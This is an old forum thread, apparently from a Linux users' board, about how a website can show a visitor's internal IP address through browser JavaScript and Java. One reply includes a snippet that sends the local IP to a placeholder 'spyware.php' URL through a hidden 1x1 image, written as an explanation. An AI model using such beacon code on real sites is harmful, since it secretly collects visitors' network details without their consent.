# Internal IP shows outside in browser

## vcihon

I am running Shorewall on a dual-homed box and am using MASQ for my internal network.

When I went to http://www.popupcheck.com, I was surprised to find that it could correctly detect my internal IP (in red by the logon banner - if you don't see it, you don't have this probelm).  It claimed I needed a patch however this happened with both Mozilla 1.73 and IE 6 (XPSP2).  I can repeat this on other internal computers.

I ran tcpdump on my firewall and did not see any internal addresses so it doesn't appear to be a firewall misconfiguration.  I assume it is something to do with javascript.

I'm not sure how to troubleshoot - ideas anyone?

----------

## hds

so what is the security risk here? i wouldnt mind anyone seeing my 192.x or 10x address?

----------

## tuxmin

 *vcihon wrote:*   

> I assume it is something to do with javascript.
> 
> 

 

You assume right. The Java Script runs on your local machine. So it can read your local IP. Disabling JavaScript is the only workaround I know.

----------

## nobspangle

I've had a quick look at this, it looks like a con to me to make you buy some of this "patch management software" I don't think the website actually know your IP I think this is happening internally on your PC, it's definatley nothing to do with the firewall because the so called problem does not exist when you visit the site from a browser with javascript turned off. The private IP isn't even leaving your system as was shown by your tcpdump.

----------

## hds

if you dont mind the german language, and have noone around you checking your system using nmap from the outside, this URL might be of interesst:

http://check.lfd.niedersachsen.de/start.php

----------

## UberLord

 *nobspangle wrote:*   

> I've had a quick look at this, it looks like a con to me to make you buy some of this "patch management software" I don't think the website actually know your IP I think this is happening internally on your PC

 

Ah but it could.

Whats to stop javascript from sending the internal IP to an internet resource -  such as a PHP page? Not that it's going todo much good as it's an internal IP though ....

----------

## stickboy2642

Unfortunately, there is nothing short of disabling JavaScript in your browser to prevent someone getting your internal IP.  There are actually a lot of things that Javascript can pass back to the calling server, including your screen resolution and color depth of your screen.  The main thing is that this is not a problem with your firewall, but with Javascript grabbing the information directly from your browser and passing it to some script (possibly a PHP or ASP script).  The IP address that is being logged in the site's log files, etc, is the external IP of your network.  Other than annoying problems with JS on yoru browser, you really have nothing to worry about with regards to this.

----------

## hds

 *UberLord wrote:*   

> 
> 
> Whats to stop javascript from sending the internal IP to an internet resource.

 

it doesnt. your very own javascript does show your very own IP. there is absolutly nothing to worry about.

btw: stickyboy - get your facts straight!

----------

## stickboy2642

The following code snippet will print your IP address to the screen:

```

<script language="javascript">

if(!document.all) {

   var localIP = "" + java.net.InetAddress.getLocalHost().getHostAddress();

   document.write("Your IP address is " + localIP);

}else {

    document.write("This method does not work in Internet Explorer");

}

</script>

```

The following snippet of code will send your local IP address to a remote file called spyware.php that is called from an image tag:

```

if (!document.all){

   var localIP = "" + java.net.InetAddress.getLocalHost().getHostAddress();

   document.write("<img src='http://www.somedomain.com/spyware.php?userIP=" + localIP + "' border=0 width=1 height=1>);

}else {

    document.write("This method does not work in Internet Explorer");

}

```

Note that the above code snipped does not work in IE, and will not work if you have java or javascript disabled in your browser.  I am sure that there is a method for doing the same thing in IE, but it has been a long time since I have used this for anything, and I would have to research to find it.

But the point still remains that this is not something to really be worried about.  Even if they do have your local IP address, it is very unlikely that they would be able to do anything with it if you have your firewall set up securely.  And it is most likely that they are just displaying your IP to the screen.

btw: hds - please know the facts yourself before you tell others to get their facts straight!

----------

## vcihon

Thanks for the replies.  At least I understand what is going on here . . . .

----------

## hds

all of this code will not send my local ip anywhere, sorry.

the javascript code will of course show my ip, locally to me. it will not send it to 3rd partys if the javascript is called elsewhere.

however, you are welcome you proove me wrong, and put code on a server at your desire. gimme the URL, i will execute that code and you tell me my IP.

----------

## nobspangle

it's very easy to send your local IP back to a server.

Page 1 has javascript that collects the IP and has a link to page 2

clicking the link to page 2 sends the IP to the server as POST data and page 2 uses that to display the IP address.

----------

## stickboy2642

What nobspangle said is exactly correct.  Anything that can be printed as text on the screen can just as well be printed in the context of a get or post variable, inside of a form field, or anywhere else on the page.  It could be passed to the server via a querystring parameter within a link, as a value in a form field, or it can be passed in as a querystring parameter within an image tag.  There are many web statistics packages that use this exact type of functionality to get more accurate information about a user's visit to a site (Urchin passes various parameters back to the server via GET parameters appended to the end of an image request).  Do a search on "javascript statistics tracking" and you will see hundreds of pages advertising javascript based statistics tracking packages that do this exact kind of thing.

The bottom line is that if the information can be printed on the screen, then it can be sent back to the server just as easily, and there is not much that can be done aside from disabling javascript (and/or in the case of the IP Address, disabling java).

----------

## fleed

 *hds wrote:*   

> all of this code will not send my local ip anywhere, sorry.
> 
> the javascript code will of course show my ip, locally to me. it will not send it to 3rd partys if the javascript is called elsewhere.
> 
> however, you are welcome you proove me wrong, and put code on a server at your desire. gimme the URL, i will execute that code and you tell me my IP.

 

Do you know anything at all about javascript? It's salient you do not know much about it so you should not make such bold statements. If javascript can get your local ip it CAN send it back, just like it can send ANY information it has available back. Maybe you should start RTFM before you say silly things. And the code that stickboy created should be proof enough. Just copy/paste it into a local .html file and run it with your browser. The failure to fetch the spyware.php file, but WITH your local ip should be enough for you.

----------

